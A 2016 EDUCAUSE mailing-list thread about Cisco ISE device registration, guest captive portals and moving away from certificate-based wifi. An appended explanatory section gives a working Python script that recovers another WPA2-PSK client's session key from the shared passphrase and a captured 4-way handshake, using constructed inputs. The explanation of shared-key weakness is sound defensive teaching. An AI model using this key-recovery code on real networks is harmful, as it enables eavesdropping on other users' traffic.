We've never used certs, but have had username/password-based 802.1x for internal use and an unencrypted network for guests. I'm unsure if you're looking for guests or less-capable devices from internal constituents, so I'll try to address both.
We're now (as of this summer) using ISE for our guest/non-802.1x-capable-devices wifi. Registering devices is just the ISE device registration portal (screenshots at https://goo.gl/iPdbGv). No complaints on that functionality so far. Registration is intended for devices which don't support 802.1x (whether at all or just not practically), but there's nothing technically stopping someone from registering their phone or whatever if they don't need internal non-public access and prefer that route to just using CAT.

The same network is used for guests with a captive portal. It seems to work as expected, although the self-reg is oriented around creating an account and then logging in devices, so to streamline that we had to think outside the box and add a couple lines of CSS (it wasn't something the vendor would configure). The guest process in screenshots: https://goo.gl/5FHFP6

We also allow people to sign in, which grants access for the same ~1 day as guests and prompts them to eduroam or registration for longer-term access (https://goo.gl/mEbx5x). The login option is primarily to facilitate onboarding to eduroam (provide them access to the CAT website, as our config effectively requires it), thus not auto-registering the device for continued access.

Unless you go with a system allowing per-user PSK (AFAIK not Cisco currently), I feel attempting that for general use is just giving false security (in a negative way). Once that key is known by any malicious party (including just a compromised system), there's nothing significant stopping them from looking at traffic for other users. If that key is on devices from guests and/or a not-very-tightly-controlled segment of the community...

On Mon, Aug 1, 2016 at 9:05 AM, T. Shayne Ghere <[email protected]> wrote:
> Good morning,
>
> Currently we have a home grown wireless registration system in place that is becoming obsolete. We are getting ready to refresh our Cisco AP's, and I'm writing to see if anyone has any positive/negative issues in using Cisco ISE for individual "self" registration on your wireless network.
>
> We also use WPA2/AES Certificate based security, but that is problematic because of compatibility issues and devices that have no way of accepting certs. In talking with some Cisco Wireless Engineers, they recommend WPA2/AES-PSK but we don't have the manpower to set that up on every device. We also do not NAT any devices.
>
> If you have any suggestions, or comments on using ISE and moving away from Certs, I would greatly appreciate them.
>
> Thanks
>
> Shayne
>
> ----------------------------------
> T. Shayne Ghere
> Bradley University
> Wireless/Lan Network Engineer
> 1501 W. Bradley Ave, Jobst 224A
> [email protected]
> *FBI CA Graduate 2011 Alumni*
> *FBI InfraGard Member*
> ----------------------------------
> *UPCOMING OUT OF OFFICE*
> None
>
> ********** Participation and subscription information for this EDUCAUSE Constituent Group discussion list can be found at http://www.educause.edu/groups/.

--
Jeremy Mooney
ITS - Bethel University
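The point Jeremy makes about a shared PSK is worth seeing concretely. On a WPA2-PSK network every client derives the same PMK from the passphrase and SSID, and the per-session keys are then derived from that PMK plus values that are sent in the clear during the 4-way handshake (the two MAC addresses and the two nonces). So anyone holding the PSK who captures another client's handshake can recompute that client's temporal key. The script below is an added example, not code from this thread or from Cisco or ISE; the SSID, passphrase, MACs, nonces and the EAPOL-Key message 2 frame are constructed for illustration, not captured from a real network. The PBKDF2 step is checked against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE").

```python
"""Derive another WPA2-PSK client's session keys from the shared passphrase plus
the public fields of its captured 4-way handshake (added example; all inputs
below are constructed, not captured)."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    On a shared-PSK network every client ends up with this same PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """IEEE 802.11 PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i)
    for i = 0, 1, ... and truncate to the requested length."""
    out = b""
    i = 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:length]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes):
    """PTK for CCMP is 48 bytes: KCK(16) || KEK(16) || TK(16). The only
    per-session inputs are the MACs and nonces, all visible to a sniffer."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    return ptk[:16], ptk[16:32], ptk[32:48]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 key descriptor version 2: MIC is the first 16 bytes of HMAC-SHA1 over
    the whole EAPOL frame with its Key MIC field (offset 81, 16 bytes) zeroed."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (no Key Data), laid out like a real one:
    EAPOL header (4) then descriptor type, key info, key length, replay counter,
    nonce, IV, RSC, key ID, MIC and key data length."""
    body = (b"\x02"                     # descriptor type: RSN
            + b"\x01\x0a"               # key info: pairwise, MIC present, version 2
            + b"\x00\x10"               # key length: 16 (CCMP)
            + b"\x00" * 7 + b"\x01"     # replay counter: 1
            + snonce                    # 32-byte SNonce, sent in the clear
            + b"\x00" * 16              # key IV
            + b"\x00" * 8               # key RSC
            + b"\x00" * 8               # key ID (reserved)
            + mic                       # key MIC
            + b"\x00\x00")              # key data length: 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


# Constructed network parameters (assumptions, not a real deployment).
SSID = "GuestNet"
PASSPHRASE = "sharedsecret1"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def client_sign_msg2() -> bytes:
    """What the legitimate client does: derive its KCK and MIC message 2."""
    pmk = pmk_from_passphrase(PASSPHRASE, SSID)
    kck, _, _ = derive_ptk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


def recover_session_key(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes,
                        anonce: bytes, msg2: bytes):
    """What anyone else holding the PSK can do with a sniffed handshake: rebuild
    the PTK, confirm it via the message 2 MIC, and return the client's TK
    (the key that protects that client's data frames). None if the MIC fails."""
    snonce = msg2[17:49]
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck, _, tk = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)
    if not hmac.compare_digest(eapol_mic(kck, msg2), msg2[81:97]):
        return None
    return tk


if __name__ == "__main__":
    captured = client_sign_msg2()
    tk = recover_session_key(PASSPHRASE, SSID, AP_MAC, CLIENT_MAC, ANONCE, captured)
    print("recovered TK:", tk.hex() if tk else None)
```

The MIC check is what tools like aircrack-ng use to confirm a candidate PSK against a captured handshake; here it is used the other way round, to show that a correct PSK plus the handshake of any other client on the SSID yields that client's TK. With a per-user PSK the PMK differs per user and the derivation above fails for everyone but the key's owner, which is the distinction Jeremy draws.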
